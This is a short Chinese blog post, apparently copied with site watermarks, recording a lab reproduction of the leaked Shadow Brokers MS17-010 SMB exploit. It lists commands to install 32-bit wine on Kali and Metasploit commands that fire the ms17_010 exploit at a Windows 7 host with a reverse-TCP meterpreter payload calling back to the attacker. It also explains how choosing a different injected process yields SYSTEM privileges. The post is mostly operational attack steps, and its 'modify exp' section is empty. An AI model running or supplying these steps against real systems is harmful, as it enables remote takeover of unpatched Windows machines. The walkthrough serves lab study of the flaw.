前言Shadow Brokers公布的文件需要win32位+python2.6+pywin32环境,利用起来有很多设置,略显麻烦,正好t00ls有相关的exp和利用过程,我就写了这篇文章记录我自己的一个复现过程。 0x00 创建winekali 64位kali 64位需要兼容32位环境才可以使用,执行以下命令来安装32位运行库 //内容来自AnYun.ORG 'dpkg --add-architecture i386 apt-get update apt-get install lib32z1 lib32ncurses5 apt-get install wine32 wine cmd.exe' //内容来自安云网 kali 32位直接执行 'wine cmd.exe'即可 0x01修改exp
0x02 复现攻击机:kali 192.168.1.108 靶 机:win7 64位 旗舰版 sp1(关闭防火墙) MSF使用就很简单了,下面列出主要的命令 'use exploit/windows/smb/ms17_010_smb_RCE set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.1.108 set rhost 192.168.1.107 set target 9 set targetarchitecture x64 exploit' 0x03 结语本人菜鸟,记录的都是很简单的一些东西,大牛绕过就可以了,谢谢,欢迎交流。md语法也是一边百度一边用,可能排版不好,请见谅。 参考链接:https://www.t00ls.net/thread-39584-1-1.html 纠正按照上面的攻击过程获取到的权限一般都是local service \ network service,无法进行提权。问题出现在PROCESSINJECT(注入进程)的设置上。上文中注入的进程是svchost.exe,我们查看进程可以发现svchost.exe有多个进程,分别有local service \ network service \ system三种权限。 这也就难怪获得的权限是local service \ network service。 或者你可以每次利用时set PROCESSINJECT 进程名 设置即可。 End |